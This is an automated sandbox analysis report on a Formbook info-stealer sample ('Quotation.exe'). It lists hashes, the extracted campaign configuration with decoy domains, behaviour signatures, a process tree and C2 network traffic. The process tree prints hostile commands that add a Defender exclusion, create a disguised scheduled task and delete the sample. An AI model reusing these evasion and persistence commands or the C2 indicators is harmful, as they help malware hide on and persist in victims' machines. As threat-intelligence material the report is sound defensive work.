Analysis

  • max time kernel
    150s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/05/2023, 10:19 UTC

General

  • Target

    Quotation.exe

  • Size

    704KB

  • MD5

    64d571f6ab61788ccd1d0e7e83f85e1e

  • SHA1

    65c6d2dc29a74b4ae79594c2a0517c41a0798f9c

  • SHA256

    b81deeedf20176eab269dc52fb165d8d8c7f74fe3bddf09089702b37dd012ce6

  • SHA512

    29f813bf6539d76e68955f93ab96b2a8b3174118f05be8a9ec4432e9761ac7694863146e29247cfedd243414fdebd07ebbdb3537e5a729f985bc6ba3686e89a1

  • SSDEEP

    12288:MPFQH49xB8v6CJvt7pxtQdqqEoL9zH95wo3BE:CFQY9EtxtQdBEoL9zb3O

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

ce18

Decoy

kenfinnegan.com

exopestireland.com

allthingzbeautiellc.com

attractiveidiot.com

calmsealight.com

ectobyte.com

8rr.xyz

hcmajq.info

alisongraceventures.com

jamtanganbagus.online

forexpropfirmmastery.com

coupimmobilier.com

amarisetechnologies.com

countrykidsclothing.com

eyecatcher.tech

merxip.online

fiteallc.com

themensroombarber.co.uk

seroofingtelford.co.uk

birdie786.com

Signatures

  • Formbook

    Formbook is a data-stealing malware family.

  • Formbook payload 6 IoCs
  • Deletes itself 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Users\Admin\AppData\Local\Temp\Quotation.exe
      "C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1380
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wKVmDzRBwGW.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:668
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wKVmDzRBwGW" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBD86.tmp"
        3⤵
        • Creates scheduled task(s)
        PID:808
      • C:\Users\Admin\AppData\Local\Temp\Quotation.exe
        "C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
        3⤵
        PID:944
      • C:\Users\Admin\AppData\Local\Temp\Quotation.exe
        "C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
      • C:\Windows\SysWOW64\NAPSTAT.EXE
        "C:\Windows\SysWOW64\NAPSTAT.EXE"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1604
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
          3⤵
          • Deletes itself
          PID:1972

    Network

    • flag-us
      DNS
      www.forexpropfirmmastery.com
      Explorer.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.forexpropfirmmastery.com
      IN A
      Response
    • flag-us
      DNS
      www.amarisetechnologies.com
      Explorer.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.amarisetechnologies.com
      IN A
      Response
      www.amarisetechnologies.com
      IN CNAME
      amarisetechnologies.com
      amarisetechnologies.com
      IN A
      103.213.238.82
    • flag-bd
      GET
      http://www.amarisetechnologies.com/ce18/?AN=6a3I8bcj/M0caEP40phs2xumxfzjwqT9vaQ5ZYtWSl91lHGtFFE2LeT7tLv95yfk&2ds=izrLUxfxB4ht7
      Explorer.EXE
      Remote address:
      103.213.238.82:80
      Request
      GET /ce18/?AN=6a3I8bcj/M0caEP40phs2xumxfzjwqT9vaQ5ZYtWSl91lHGtFFE2LeT7tLv95yfk&2ds=izrLUxfxB4ht7 HTTP/1.1
      Host: www.amarisetechnologies.com
      Connection: close
      Response
      HTTP/1.1 302 Found
      content-type: text/html
      content-length: 706
      date: Wed, 03 May 2023 10:21:06 GMT
      server: LiteSpeed
      location: 404.html
      connection: close
    • 103.213.238.82:80
      http://www.amarisetechnologies.com/ce18/?AN=6a3I8bcj/M0caEP40phs2xumxfzjwqT9vaQ5ZYtWSl91lHGtFFE2LeT7tLv95yfk&2ds=izrLUxfxB4ht7
      http
      Explorer.EXE
      354 B
      1.1kB
      4
      5

      HTTP Request

      GET http://www.amarisetechnologies.com/ce18/?AN=6a3I8bcj/M0caEP40phs2xumxfzjwqT9vaQ5ZYtWSl91lHGtFFE2LeT7tLv95yfk&2ds=izrLUxfxB4ht7

      HTTP Response

      302
    • 8.8.8.8:53
      www.forexpropfirmmastery.com
      dns
      Explorer.EXE
      74 B
      147 B
      1
      1

      DNS Request

      www.forexpropfirmmastery.com

    • 8.8.8.8:53
      www.amarisetechnologies.com
      dns
      Explorer.EXE
      73 B
      103 B
      1
      1

      DNS Request

      www.amarisetechnologies.com

      DNS Response

      103.213.238.82

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmpBD86.tmp

      Filesize

      1KB

      MD5

      753d4588c59af7a42f5d1949602c6598

      SHA1

      677bc5fe37077696fd51342412f9a693d634a9bf

      SHA256

      258a79e97a9501dec12880e6a9ed3d6d96129fd7a6384c12ee4ea61854bc90b8

      SHA512

      7ec680cbe0130f2531ab6949e671f99244c427cb0a72e6496402a88e293eb77374d41d7109254fd00ab1495e5b68d3117bdf8144c2cfcde3940e618170760a52

    • memory/668-74-0x00000000025E0000-0x0000000002620000-memory.dmp

      Filesize

      256KB

    • memory/668-73-0x00000000025E0000-0x0000000002620000-memory.dmp

      Filesize

      256KB

    • memory/1264-96-0x00000000061C0000-0x00000000062CC000-memory.dmp

      Filesize

      1.0MB

    • memory/1264-78-0x0000000006B90000-0x0000000006D16000-memory.dmp

      Filesize

      1.5MB

    • memory/1264-93-0x00000000061C0000-0x00000000062CC000-memory.dmp

      Filesize

      1.0MB

    • memory/1264-92-0x00000000061C0000-0x00000000062CC000-memory.dmp

      Filesize

      1.0MB

    • memory/1264-82-0x0000000007410000-0x000000000758E000-memory.dmp

      Filesize

      1.5MB

    • memory/1264-80-0x00000000037A0000-0x00000000038A0000-memory.dmp

      Filesize

      1024KB

    • memory/1380-58-0x0000000000520000-0x000000000052C000-memory.dmp

      Filesize

      48KB

    • memory/1380-59-0x0000000005A30000-0x0000000005AAE000-memory.dmp

      Filesize

      504KB

    • memory/1380-57-0x0000000004E70000-0x0000000004EB0000-memory.dmp

      Filesize

      256KB

    • memory/1380-67-0x0000000004840000-0x0000000004886000-memory.dmp

      Filesize

      280KB

    • memory/1380-56-0x0000000000410000-0x0000000000420000-memory.dmp

      Filesize

      64KB

    • memory/1380-55-0x0000000004E70000-0x0000000004EB0000-memory.dmp

      Filesize

      256KB

    • memory/1380-54-0x0000000000A10000-0x0000000000AC6000-memory.dmp

      Filesize

      728KB

    • memory/1492-75-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-71-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-76-0x0000000000AD0000-0x0000000000DD3000-memory.dmp

      Filesize

      3.0MB

    • memory/1492-81-0x00000000001E0000-0x00000000001F5000-memory.dmp

      Filesize

      84KB

    • memory/1492-69-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-84-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-68-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-77-0x0000000000140000-0x0000000000155000-memory.dmp

      Filesize

      84KB

    • memory/1492-70-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/1604-83-0x0000000000610000-0x0000000000656000-memory.dmp

      Filesize

      280KB

    • memory/1604-88-0x0000000000080000-0x00000000000AF000-memory.dmp

      Filesize

      188KB

    • memory/1604-90-0x0000000001E10000-0x0000000001EA4000-memory.dmp

      Filesize

      592KB

    • memory/1604-87-0x0000000001EC0000-0x00000000021C3000-memory.dmp

      Filesize

      3.0MB

    • memory/1604-86-0x0000000000080000-0x00000000000AF000-memory.dmp

      Filesize

      188KB

    • memory/1604-85-0x0000000000610000-0x0000000000656000-memory.dmp

      Filesize

      280KB
